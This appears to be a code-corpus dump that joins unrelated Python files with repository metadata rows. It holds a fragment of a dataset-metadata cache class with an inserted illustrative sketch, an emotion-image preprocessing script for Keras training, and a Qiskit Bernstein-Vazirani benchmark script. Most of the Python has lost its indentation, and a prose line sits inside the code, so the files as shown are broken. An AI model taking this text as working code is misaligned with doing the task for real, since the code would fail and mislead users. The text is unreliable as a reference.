self._debug = debug_value
if self._debug:
logger.setLevel(logging.DEBUG)
logging.getLogger(self.__module__).setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.getLogger(self.__module__).setLevel(logging.INFO)
logger.debug('Logger {} set to level {}'.format(logger.name, logger.level))
logging.getLogger(self.__module__).debug('Logger {} set to level {}'.format(self.__module__, logger.level))
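A minimal in-memory subclass sketch (purely illustrative; the real implementations are database-backed and every method body below is an assumption):
class InMemoryDatasetMetadataCache(DatasetMetadataCache):
    def __init__(self, debug=False):
        self._datasets = []
        super().__init__(debug)
    def add_dataset(self, dataset):
        self._datasets.append(dataset)
    def add_survey(self, ga_survey_id, survey_name=None):
        pass  # surveys are implicit in this toy version
    def add_keywords(self, dataset_id, keyword_list):
        pass  # keywords already live on the Dataset objects
    def add_distributions(self, dataset_id, distribution_list):
        pass  # distributions already live on the Dataset objects
    def search_dataset_distributions(self, keyword_list, protocol, ll_ur_coords=None):
        # keywords combine with "and", matching the documented semantics
        return [d for d in self._datasets
                if set(keyword_list) <= set(d.keyword_list)
                and any(dist.protocol == protocol for dist in d.distribution_list)]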
|
[
"alex@trentham.net.au"
] |
alex@trentham.net.au
|
7b2a4ddc6b7320391e621149122948f371ce83e6
|
6e8f2e28479566dbaa338300b2d61f784ff83f97
|
/.history/code/preprocess_20210419145511.py
|
677f86d7c80961ac295d19e0eb7be0aa3ad43e69
|
[] |
no_license
|
eeng5/CV-final-project
|
55a7d736f75602858233ebc380c4e1d67ab2b866
|
580e28819560b86f6974959efb1d31ef138198fc
|
refs/heads/main
| 2023-04-09T21:28:21.531293
| 2021-04-21T19:57:22
| 2021-04-21T19:57:22
| 352,703,734
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,674
|
py
|
import os
import random
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from PIL import Image
import tensorflow as tf
import hyperparameters as hp
class Datasets():
""" Class for containing the training and test sets as well as
other useful data-related information. Contains the functions
for preprocessing.
"""
def __init__(self, data_path, task, aug):
self.data_path = data_path
self.emotions = ['angry', 'happy', 'disgust', 'sad', 'neutral', 'surprise', 'fear']
self.emotion_dict = self.createEmotionDict()
self.task = task
self.aug = aug
if self.aug == '1':
self.createSimpleData()
else:
self.createComplexData()
# Dictionaries for (label index) <--> (class name)
self.idx_to_class = {}
self.class_to_idx = {}
# For storing list of classes
self.classes = [""] * hp.num_classes
# Setup data generators
self.train_data = self.get_data(
os.path.join(self.data_path, "train/"), False)
self.test_data = self.get_data(
os.path.join(self.data_path, "test/"), False)
def cleanTestDirs(self,):
for e in self.emotions:
pathy = self.data_path+'test/'+e
pics = 1
for f in Path(pathy).glob('*.jpg'):
if (pics <= 100):
pics+=1
else:
try:
#f.unlink()
os.remove(f)
                    except OSError as err:
                        print("Error: %s : %s" % (f, err.strerror))
def cleanTrainDirs(self,):
for e in self.emotions:
pathy = self.data_path+'train/'+e
for f in Path(pathy).glob('*.jpg'):
try:
#f.unlink()
os.remove(f)
                except OSError as err:
                    print("Error: %s : %s" % (f, err.strerror))
def cleanAll(self,):
self.cleanTestDirs()
self.cleanTrainDirs()
def createPixelArray(self, arr):
arr = list(map(int, arr.split()))
array = np.array(arr, dtype=np.uint8)
array = array.reshape((48, 48))
return array
def equalize_hist(self, img):
img = cv2.equalizeHist(img)
return img
def showImages(self, imgs):
_, axs = plt.subplots(1, len(imgs), figsize=(20, 20))
axs = axs.flatten()
for img, ax in zip(imgs, axs):
ax.imshow(img,cmap=plt.get_cmap('gray'))
plt.show()
def augmentIMG(self, img, task):
imgs = [img]
img1 = self.equalize_hist(img)
imgs.append(img1)
img2 = cv2.bilateralFilter(img1, d=9, sigmaColor=75, sigmaSpace=75)
imgs.append(img2)
if task == 3:
kernel = np.array([[-1.0, -1.0, -1.0],
[-1.0, 9, -1.0],
[-1.0, -1.0, -1.0]])
img3 = cv2.filter2D(img2,-1,kernel)
imgs.append(img3)
img4 = self.equalize_hist(img3)
imgs.append(img4)
img5 = cv2.bilateralFilter(img4, d=9, sigmaColor=100, sigmaSpace=100)
imgs.append(img5)
img6 = cv2.flip(img, 1) # flip horizontally
imgs.append(img6)
return imgs
def saveIMG(self, arr, num, folderLoc):
im = Image.fromarray(arr)
filename = folderLoc + "image_"+ num+".jpg"
im.save(filename)
def createTrain(self, task):
path1 = self.data_path+"train.csv"
df = pd.read_csv(path1) # CHANGE ME
        base_filename = self.data_path + "train/" # CHANGE ME
for index, row in df.iterrows():
px = row['pixels']
emot = int(row['emotion'])
emot_loc = self.emotion_dict[emot]
filename = base_filename + emot_loc
img = self.createPixelArray(px)
img_arr = self.augmentIMG(img, task)
idx = 0
for i in img_arr:
num = str(index) + "_" + str(idx)
idx +=1
self.saveIMG(i, num, filename)
def createTest(self, task):
        path1 = self.data_path + "icml_face_data.csv"
df = pd.read_csv(path1) # CHANGE ME
        base_filename = self.data_path + "test/" # CHANGE ME
for index, row in df.iterrows():
if (row[' Usage'] == "PublicTest"):
px = row[' pixels']
emot = int(row['emotion'])
emot_loc = self.emotion_dict[emot]
filename = base_filename + emot_loc
img = self.createPixelArray(px)
img_arr = self.augmentIMG(img, task)
idx = 0
for i in img_arr:
num = str(index) + "_" + str(idx)
idx +=1
                    self.saveIMG(i, num, filename)
def createEmotionDict(self,):
emotionDict = {}
emotionDict[0]="angry/"
emotionDict[1]="disgust/"
emotionDict[2]="fear/"
emotionDict[3]="happy/"
emotionDict[4]="sad/"
emotionDict[5]="surprise/"
emotionDict[6] = "neutral/"
return emotionDict
def createSimpleData(self,):
self.cleanAll()
print("Cleaning done")
emot_dict = self.createEmotionDict()
self.createTrain(1)
print("Training Data Generation done")
self.createTest(1)
print("Testing Data Generation done")
def createComplexData(self,):
self.cleanAll()
emot_dict = self.createEmotionDict()
        self.createTrain(3)
        self.createTest(3)
def preprocess_fn(self, img):
""" Preprocess function for ImageDataGenerator. """
img = img / 255.
return img
def get_data(self, path, shuffle):
""" Returns an image data generator which can be iterated
through for images and corresponding class labels.
Arguments:
path - Filepath of the data being imported, such as
"../data/train" or "../data/test"
shuffle - Boolean value indicating whether the data should
be randomly shuffled.
Returns:
An iterable image-batch generator
"""
data_gen = tf.keras.preprocessing.image.ImageDataGenerator(preprocessing_function=self.preprocess_fn)
# VGG must take images of size 224x224
img_size = hp.img_size
classes_for_flow = None
# Make sure all data generators are aligned in label indices
if bool(self.idx_to_class):
classes_for_flow = self.classes
# Form image data generator from directory structure
data_gen = data_gen.flow_from_directory(
path,
target_size=(img_size, img_size),
class_mode='sparse',
batch_size=hp.batch_size,
shuffle=shuffle,
classes=classes_for_flow)
# Setup the dictionaries if not already done
if not bool(self.idx_to_class):
unordered_classes = []
for dir_name in os.listdir(path):
if os.path.isdir(os.path.join(path, dir_name)):
unordered_classes.append(dir_name)
for img_class in unordered_classes:
self.idx_to_class[data_gen.class_indices[img_class]] = img_class
self.class_to_idx[img_class] = int(data_gen.class_indices[img_class])
self.classes[int(data_gen.class_indices[img_class])] = img_class
return data_gen
|
[
"natalie_rshaidat@brown.edu"
] |
natalie_rshaidat@brown.edu
|
2701c269f7ccc8bd889ed6aafc49b1be6127a794
|
09e57dd1374713f06b70d7b37a580130d9bbab0d
|
/data/p3BR/R1/benchmark/startQiskit_Class305.py
|
5f8ebb32204cb0db962ae68cdf9fa47b28ced1cb
|
[
"BSD-3-Clause"
] |
permissive
|
UCLA-SEAL/QDiff
|
ad53650034897abb5941e74539e3aee8edb600ab
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
refs/heads/main
| 2023-08-05T04:52:24.961998
| 2021-09-19T02:56:16
| 2021-09-19T02:56:16
| 405,159,939
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,321
|
py
|
# qubit number=3
# total number=57
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.rx(-0.09738937226128368,input_qubit[2]) # number=2
prog.h(input_qubit[1]) # number=33
prog.cz(input_qubit[2],input_qubit[1]) # number=34
prog.h(input_qubit[1]) # number=35
prog.h(input_qubit[1]) # number=3
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
# measure
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
sample_shot =4000
writefile = open("../data/startQiskit_Class305.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
backend = BasicAer.get_backend('statevector_simulator')
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
|
[
"wangjiyuan123@yeah.net"
] |
wangjiyuan123@yeah.net
|